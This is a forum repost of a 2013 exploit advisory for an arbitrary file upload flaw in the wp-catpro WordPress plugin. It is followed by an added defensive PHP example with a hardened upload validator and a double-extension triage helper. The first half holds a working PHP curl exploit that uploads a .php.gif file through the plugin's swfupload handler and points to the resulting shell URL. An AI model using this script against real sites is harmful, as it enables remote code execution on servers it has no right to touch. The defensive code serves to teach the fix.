Views: 2077 | Replies: 0

WordPress plugin wp-catpro arbitrary file upload

Original poster, posted on 2013-2-27 20:12:43
WordPress plugin - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
#
Author => Zikou-16
Email  => zikou16x@gmail.com
Tested on: Windows 7, Backtrack 5r3
Download: http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
#####
#
#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

<?php
// zik.php.gif, the file uploaded above
phpinfo();
?>
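The weakness the advisory describes is a name-only check: the handler whitelists ("jpg", "gif", "png") as the final extension, but its filename regex also permits '.', so a name such as shell.php.gif is accepted, and on servers that match the PHP handler against any extension in the name (Apache's AddHandler behaviour) the stored file runs as PHP. The client also chooses the destination through the 'folder' POST field. The following is an added example written for this page, not the wp-catpro plugin's or the advisory author's code: a hardened upload check that allows exactly one extension, verifies the claimed type against the file's leading bytes, chooses the storage name and directory server-side, plus a small triage helper for finding double-extension names already sitting in an uploads directory. The catpro_* function names, CATPRO_* constants, directory path and sample inputs are all constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not the wp-catpro plugin's or the advisory author's code.
// Names (catpro_* functions, CATPRO_* constants) and sample inputs are constructed.

// Same whitelist the advisory quotes from the plugin.
const CATPRO_ALLOWED_EXT = ['jpg', 'gif', 'png'];

// Leading bytes each allowed type must start with, so a file is checked by
// content as well as by name.
const CATPRO_MAGIC = [
    'jpg' => ["\xFF\xD8\xFF"],
    'gif' => ['GIF87a', 'GIF89a'],
    'png' => ["\x89PNG\r\n\x1A\n"],
];

// Fixed server-side destination (constructed path); the client's 'folder'
// POST field is never consulted.
const CATPRO_UPLOAD_DIR = '/var/www/wp-content/uploads/catpro';

/**
 * Validate a client-supplied file name and the first bytes of its content.
 * Returns the extension the file may be stored with, or null to reject.
 */
function catpro_validate_upload(string $clientName, string $contents): ?string
{
    // Drop any directory part, whatever separator the client used.
    $name = basename(str_replace('\\', '/', $clientName));

    // Exactly one dot: "shell.php.gif", ".htaccess" and "noext" all fail here.
    if (substr_count($name, '.') !== 1) {
        return null;
    }
    [$stem, $ext] = explode('.', $name, 2);
    $ext = strtolower($ext);

    // Conservative stem alphabet instead of the plugin's permissive regex.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $stem)) {
        return null;
    }
    if (!in_array($ext, CATPRO_ALLOWED_EXT, true)) {
        return null;
    }
    // The body must look like the image type the extension claims.
    foreach (CATPRO_MAGIC[$ext] as $magic) {
        if (strncmp($contents, $magic, strlen($magic)) === 0) {
            return $ext;
        }
    }
    return null;
}

/** Server-chosen storage path: random stem plus the validated extension only. */
function catpro_storage_path(string $ext): string
{
    return CATPRO_UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Triage helper for an existing uploads directory: return the names that
 * carry more than one extension and include a PHP-executable one anywhere.
 */
function catpro_find_double_extensions(array $names): array
{
    $deny = ['php', 'php3', 'php5', 'phtml', 'phar'];
    $hits = [];
    foreach ($names as $n) {
        $parts = explode('.', strtolower(basename($n)));
        if (count($parts) > 2 && array_intersect(array_slice($parts, 1), $deny)) {
            $hits[] = $n;
        }
    }
    return $hits;
}

// Constructed inputs: the advisory's payload name, a plain GIF, a PNG name on
// GIF bytes, a name with a path prefix, and an upper-case extension.
$cases = [
    ['zik.php.gif', "GIF89a\x01\x00\x01\x00"],
    ['cat.gif',     "GIF89a\x01\x00\x01\x00"],
    ['cat.png',     "GIF89a\x01\x00\x01\x00"],
    ['../cat.jpg',  "\xFF\xD8\xFF\xE0"],
    ['cat.GIF',     "GIF87a\x01\x00\x01\x00"],
];
foreach ($cases as [$clientName, $body]) {
    $ext = catpro_validate_upload($clientName, $body);
    printf("%-12s %s\n", $clientName, $ext === null ? 'rejected' : 'stored as ' . catpro_storage_path($ext));
}

// Constructed directory listing for the triage helper.
print_r(catpro_find_double_extensions(['a.gif', 'random_name.php.gif', 'b.jpg.png', 'c.phtml.jpg']));
```

Run it with `php` on the command line (PHP 7.1 or later for the nullable return type and array destructuring). The magic-byte table is deliberately narrow; in a real handler the stored file should additionally be re-encoded or validated with an image library, and the uploads directory should be served with PHP execution disabled so that a single bypassed check does not become code execution.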